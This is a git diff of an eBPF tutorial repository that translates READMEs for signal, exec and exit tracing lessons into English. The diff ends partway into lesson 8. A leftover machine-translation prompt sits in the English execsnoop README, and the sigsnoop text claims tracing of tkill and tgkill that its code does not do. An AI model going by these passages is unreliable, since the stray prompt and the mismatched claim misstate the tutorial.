100755 --- a/src/6-sigsnoop/README.md +++ b/src/6-sigsnoop/README.md @@ -1,12 +1,12 @@ -# eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 +# eBPF Tutorial by Example 6: Capturing Signal Sending and Store State with Hash Maps -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。 +This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. ## sigsnoop -示例代码如下: +The example code is as follows: ```c #include @@ -87,21 +87,21 @@ int kill_exit(struct trace_event_raw_sys_exit *ctx) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用,包括 kill、tkill 和 tgkill。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。 +The above code defines an eBPF program for capturing system calls that send signals to processes, including kill, tkill, and tgkill. It captures the enter and exit events of system calls by using tracepoints, and executes specified probe functions such as `probe_entry` and `probe_exit` when these events occur. -在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和进程的可执行文件名称。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。 +In the probe function, we use the bpf_map to store the captured event information, including the process ID of the sending signal, the process ID of the receiving signal, the signal value, and the name of the executable for the current task. When the system call exits, we retrieve the event information stored in the bpf_map and use bpf_printk to print the process ID, process name, sent signal, and return value of the system call. -最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。 +Finally, we also need to use the SEC macro to define the probe and specify the name of the system call to be captured and the probe function to be executed. -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, building, distribution, and running of eBPF programs. You can refer to for downloading and installing the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -编译运行上述代码: +Compile and run the above code: ```shell docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +or ```console $ ecc sigsnoop.bpf.c @@ -109,10 +109,10 @@ Compiling bpf object... Generating export types... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program... ``` -运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -122,9 +122,9 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 ``` -## 总结 +## Summary -本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体: +This article mainly introduces how to implement an eBPF tool to capture the collection of system calls sent by processes using signals and save the state using a hash map. Using a hash map requires defining a struct: ```c struct { @@ -135,8 +135,6 @@ struct { } values SEC(".maps"); ``` -并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。 +And using corresponding APIs for access, such as bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem, etc. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/6-sigsnoop/README.zh.md b/src/6-sigsnoop/README.zh.md new file mode 100755 index 0000000..2a8715b --- /dev/null +++ b/src/6-sigsnoop/README.zh.md @@ -0,0 +1,142 @@ +# eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。 + +## sigsnoop + +示例代码如下: + +```c +#include +#include +#include + +#define MAX_ENTRIES 10240 +#define TASK_COMM_LEN 16 + +struct event { + unsigned int pid; + unsigned int tpid; + int sig; + int ret; + char comm[TASK_COMM_LEN]; +}; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u32); + __type(value, struct event); +} values SEC(".maps"); + + +static int probe_entry(pid_t tpid, int sig) +{ + struct event event = {}; + __u64 pid_tgid; + __u32 tid; + + pid_tgid = bpf_get_current_pid_tgid(); + tid = (__u32)pid_tgid; + event.pid = pid_tgid >> 32; + event.tpid = tpid; + event.sig = sig; + bpf_get_current_comm(event.comm, sizeof(event.comm)); + bpf_map_update_elem(&values, &tid, &event, BPF_ANY); + return 0; +} + +static int probe_exit(void *ctx, int ret) +{ + __u64 pid_tgid = bpf_get_current_pid_tgid(); + __u32 tid = (__u32)pid_tgid; + struct event *eventp; + + eventp = bpf_map_lookup_elem(&values, &tid); + if (!eventp) + return 0; + + eventp->ret = ret; + bpf_printk("PID %d (%s) sent signal %d ", + eventp->pid, eventp->comm, eventp->sig); + bpf_printk("to PID %d, ret = %d", + eventp->tpid, ret); + +cleanup: + bpf_map_delete_elem(&values, &tid); + return 0; +} + +SEC("tracepoint/syscalls/sys_enter_kill") +int kill_entry(struct trace_event_raw_sys_enter *ctx) +{ + pid_t tpid = (pid_t)ctx->args[0]; + int sig = (int)ctx->args[1]; + + return probe_entry(tpid, sig); +} + +SEC("tracepoint/syscalls/sys_exit_kill") +int kill_exit(struct trace_event_raw_sys_exit *ctx) +{ + return probe_exit(ctx, ctx->ret); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用,包括 kill、tkill 和 tgkill。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。 + +在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和进程的可执行文件名称。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。 + +最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc sigsnoop.bpf.c +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 +``` + +## 总结 + +本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体: + +```c +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u32); + __type(value, struct event); +} values SEC(".maps"); +``` + +并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/6-sigsnoop/README_en.md b/src/6-sigsnoop/README_en.md deleted file mode 100755 index 7af9ca5..0000000 --- a/src/6-sigsnoop/README_en.md +++ /dev/null @@ -1,140 +0,0 @@ -# eBPF Tutorial by Example 6: Capturing Signal Sending and Store State with Hash Maps - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. - -## sigsnoop - -The example code is as follows: - -```c -#include -#include -#include - -#define MAX_ENTRIES 10240 -#define TASK_COMM_LEN 16 - -struct event { - unsigned int pid; - unsigned int tpid; - int sig; - int ret; - char comm[TASK_COMM_LEN]; -}; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u32); - __type(value, struct event); -} values SEC(".maps"); - - -static int probe_entry(pid_t tpid, int sig) -{ - struct event event = {}; - __u64 pid_tgid; - __u32 tid; - - pid_tgid = bpf_get_current_pid_tgid(); - tid = (__u32)pid_tgid; - event.pid = pid_tgid >> 32; - event.tpid = tpid; - event.sig = sig; - bpf_get_current_comm(event.comm, sizeof(event.comm)); - bpf_map_update_elem(&values, &tid, &event, BPF_ANY); - return 0; -} - -static int probe_exit(void *ctx, int ret) -{ - __u64 pid_tgid = bpf_get_current_pid_tgid(); - __u32 tid = (__u32)pid_tgid; - struct event *eventp; - - eventp = bpf_map_lookup_elem(&values, &tid); - if (!eventp) - return 0; - - eventp->ret = ret; - bpf_printk("PID %d (%s) sent signal %d ", - eventp->pid, eventp->comm, eventp->sig); - bpf_printk("to PID %d, ret = %d", - eventp->tpid, ret); - -cleanup: - bpf_map_delete_elem(&values, &tid); - return 0; -} - -SEC("tracepoint/syscalls/sys_enter_kill") -int kill_entry(struct trace_event_raw_sys_enter *ctx) -{ - pid_t tpid = (pid_t)ctx->args[0]; - int sig = (int)ctx->args[1]; - - return probe_entry(tpid, sig); -} - -SEC("tracepoint/syscalls/sys_exit_kill") -int kill_exit(struct trace_event_raw_sys_exit *ctx) -{ - return probe_exit(ctx, ctx->ret); -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -The above code defines an eBPF program for capturing system calls that send signals to processes, including kill, tkill, and tgkill. It captures the enter and exit events of system calls by using tracepoints, and executes specified probe functions such as `probe_entry` and `probe_exit` when these events occur. - -In the probe function, we use the bpf_map to store the captured event information, including the process ID of the sending signal, the process ID of the receiving signal, the signal value, and the name of the executable for the current task. When the system call exits, we retrieve the event information stored in the bpf_map and use bpf_printk to print the process ID, process name, sent signal, and return value of the system call. - -Finally, we also need to use the SEC macro to define the probe and specify the name of the system call to be captured and the probe function to be executed. - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, building, distribution, and running of eBPF programs. You can refer to for downloading and installing the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -Compile and run the above code: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -or - -```console -$ ecc sigsnoop.bpf.c -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 -``` - -## Summary - -This article mainly introduces how to implement an eBPF tool to capture the collection of system calls sent by processes using signals and save the state using a hash map. Using a hash map requires defining a struct: - -```c -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u32); - __type(value, struct event); -} values SEC(".maps"); -``` - -And using corresponding APIs for access, such as bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem, etc. - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/7-execsnoop/README.md b/src/7-execsnoop/README.md index 6625c7a..24fda3d 100644 --- a/src/7-execsnoop/README.md +++ b/src/7-execsnoop/README.md @@ -1,18 +1,18 @@ -# eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 +# eBPF Tutorial by Example 7: Capturing Process Execution, Output with perf event array -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。 +This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. ## perf buffer -eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。 +eBPF provides two circular buffers for transferring information from eBPF programs to user space controllers. The first one is the perf circular buffer, which has existed since at least kernel v4.15. The second one is the BPF circular buffer introduced later. This article only considers the perf circular buffer. ## execsnoop -通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下: +To print output to the user command line via the perf event array, a header file and a C source file need to be written. The example code is as follows: -头文件:execsnoop.h +Header file: execsnoop.h ```c #ifndef __EXECSNOOP_H @@ -32,7 +32,7 @@ struct event { #endif /* __EXECSNOOP_H */ ``` -源文件:execsnoop.bpf.c +Source file: execsnoop.bpf.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -48,7 +48,7 @@ struct { } events SEC(".maps"); SEC("tracepoint/syscalls/sys_enter_execve") -int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx) +int tracepoint_syscalls_sys_enter_execve(struct trace_event_raw_sys_enter* ctx) { u64 id; pid_t pid, tgid; @@ -72,27 +72,27 @@ int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx char LICENSE[] SEC("license") = "GPL"; ``` -这段代码定义了个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。 +This code defines an eBPF program for capturing the entry of the `execve` system call. -在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,并通过 bpf_probe_read_str 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。 +In the entry program, we first obtain the process ID and user ID of the current process, then use the `bpf_get_current_task` function to obtain the `task_struct` structure of the current process, and use the `bpf_probe_read_str` function to read the process name. Finally, we use the `bpf_perf_event_output` function to output the process execution event to the perf buffer. -使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。 +With this code, we can capture process execution events in the Linux kernel and analyze the process execution conditions.Instructions: Translate the following Chinese text to English while maintaining the original formatting: -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). -使用容器编译: +Compile using a container: ```shell docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者使用 ecc 编译: +Or compile using ecc: ```shell ecc execsnoop.bpf.c execsnoop.h ``` -运行 +Run: ```console $ sudo ./ecli run package.json @@ -106,9 +106,9 @@ TIME PID PPID UID COMM 21:28:30 40753 40752 1000 cpuUsage.sh ``` -## 总结 +## Summary -本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件: +This article introduces how to capture events of processes running in the Linux kernel and print output to the user command-line using the perf event array. After sending information to the user space via the perf event array, complex data processing and analysis can be performed. In the corresponding kernel code of libbpf, a structure and corresponding header file can be defined as follows: ```c struct { @@ -118,8 +118,8 @@ struct { } events SEC(".maps"); ``` -就可以往用户态直接发送信息。 +This allows sending information directly to the user space. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: +For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) to get more examples and complete tutorials." diff --git a/src/7-execsnoop/README.zh.md b/src/7-execsnoop/README.zh.md new file mode 100644 index 0000000..6625c7a --- /dev/null +++ b/src/7-execsnoop/README.zh.md @@ -0,0 +1,125 @@ +# eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。 + +## perf buffer + +eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。 + +## execsnoop + +通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下: + +头文件:execsnoop.h + +```c +#ifndef __EXECSNOOP_H +#define __EXECSNOOP_H + +#define TASK_COMM_LEN 16 + +struct event { + int pid; + int ppid; + int uid; + int retval; + bool is_exit; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __EXECSNOOP_H */ +``` + +源文件:execsnoop.bpf.c + +```c +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +#include +#include +#include +#include "execsnoop.h" + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); + +SEC("tracepoint/syscalls/sys_enter_execve") +int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx) +{ + u64 id; + pid_t pid, tgid; + struct event event={0}; + struct task_struct *task; + + uid_t uid = (u32)bpf_get_current_uid_gid(); + id = bpf_get_current_pid_tgid(); + tgid = id >> 32; + + event.pid = tgid; + event.uid = uid; + task = (struct task_struct*)bpf_get_current_task(); + event.ppid = BPF_CORE_READ(task, real_parent, tgid); + char *cmd_ptr = (char *) BPF_CORE_READ(ctx, args[0]); + bpf_probe_read_str(&event.comm, sizeof(event.comm), cmd_ptr); + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码定义了个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。 + +在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,并通过 bpf_probe_read_str 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。 + +使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +使用容器编译: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者使用 ecc 编译: + +```shell +ecc execsnoop.bpf.c execsnoop.h +``` + +运行 + +```console +$ sudo ./ecli run package.json +TIME PID PPID UID COMM +21:28:30 40747 3517 1000 node +21:28:30 40748 40747 1000 sh +21:28:30 40749 3517 1000 node +21:28:30 40750 40749 1000 sh +21:28:30 40751 3517 1000 node +21:28:30 40752 40751 1000 sh +21:28:30 40753 40752 1000 cpuUsage.sh +``` + +## 总结 + +本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件: + +```c +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); +``` + +就可以往用户态直接发送信息。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/7-execsnoop/README_en.md b/src/7-execsnoop/README_en.md deleted file mode 100644 index 24fda3d..0000000 --- a/src/7-execsnoop/README_en.md +++ /dev/null @@ -1,125 +0,0 @@ -# eBPF Tutorial by Example 7: Capturing Process Execution, Output with perf event array - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. - -## perf buffer - -eBPF provides two circular buffers for transferring information from eBPF programs to user space controllers. The first one is the perf circular buffer, which has existed since at least kernel v4.15. The second one is the BPF circular buffer introduced later. This article only considers the perf circular buffer. - -## execsnoop - -To print output to the user command line via the perf event array, a header file and a C source file need to be written. The example code is as follows: - -Header file: execsnoop.h - -```c -#ifndef __EXECSNOOP_H -#define __EXECSNOOP_H - -#define TASK_COMM_LEN 16 - -struct event { - int pid; - int ppid; - int uid; - int retval; - bool is_exit; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __EXECSNOOP_H */ -``` - -Source file: execsnoop.bpf.c - -```c -// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) -#include -#include -#include -#include "execsnoop.h" - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); - -SEC("tracepoint/syscalls/sys_enter_execve") -int tracepoint_syscalls_sys_enter_execve(struct trace_event_raw_sys_enter* ctx) -{ - u64 id; - pid_t pid, tgid; - struct event event={0}; - struct task_struct *task; - - uid_t uid = (u32)bpf_get_current_uid_gid(); - id = bpf_get_current_pid_tgid(); - tgid = id >> 32; - - event.pid = tgid; - event.uid = uid; - task = (struct task_struct*)bpf_get_current_task(); - event.ppid = BPF_CORE_READ(task, real_parent, tgid); - char *cmd_ptr = (char *) BPF_CORE_READ(ctx, args[0]); - bpf_probe_read_str(&event.comm, sizeof(event.comm), cmd_ptr); - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This code defines an eBPF program for capturing the entry of the `execve` system call. - -In the entry program, we first obtain the process ID and user ID of the current process, then use the `bpf_get_current_task` function to obtain the `task_struct` structure of the current process, and use the `bpf_probe_read_str` function to read the process name. Finally, we use the `bpf_perf_event_output` function to output the process execution event to the perf buffer. - -With this code, we can capture process execution events in the Linux kernel and analyze the process execution conditions.Instructions: Translate the following Chinese text to English while maintaining the original formatting: - -We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). - -Compile using a container: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile using ecc: - -```shell -ecc execsnoop.bpf.c execsnoop.h -``` - -Run: - -```console -$ sudo ./ecli run package.json -TIME PID PPID UID COMM -21:28:30 40747 3517 1000 node -21:28:30 40748 40747 1000 sh -21:28:30 40749 3517 1000 node -21:28:30 40750 40749 1000 sh -21:28:30 40751 3517 1000 node -21:28:30 40752 40751 1000 sh -21:28:30 40753 40752 1000 cpuUsage.sh -``` - -## Summary - -This article introduces how to capture events of processes running in the Linux kernel and print output to the user command-line using the perf event array. After sending information to the user space via the perf event array, complex data processing and analysis can be performed. In the corresponding kernel code of libbpf, a structure and corresponding header file can be defined as follows: - -```c -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); -``` - -This allows sending information directly to the user space. - -For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) to get more examples and complete tutorials." diff --git a/src/8-exitsnoop/README.md b/src/8-exitsnoop/README.md index fbb30a8..9983cbe 100644 --- a/src/8-exitsnoop/README.md +++ b/src/8-exitsnoop/README.md @@ -1,38 +1,38 @@ -# eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 +# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Output with Ring Buffer -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。 +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF. -## ring buffer +## Ring Buffer -现在有一个新的 BPF 数据结构可用,eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容以方便迁移,又有新的保留/提交API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,所以考虑将其作为从BPF程序向用户空间发送数据的默认选择。 +There is now a new BPF data structure available called the eBPF ring buffer. It solves the memory efficiency and event reordering issues of the BPF perf buffer, which is currently the de facto standard for sending data from the kernel to user space. It provides compatibility with perf buffer for easy migration while also introducing new reserved/commit APIs for improved usability. Additionally, synthetic and real-world benchmark tests have shown that in nearly all cases, the eBPF ring buffer should be the default choice for sending data from BPF programs to user space. -### eBPF ringbuf vs eBPF perfbuf +### eBPF Ring Buffer vs eBPF Perf Buffer -只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。 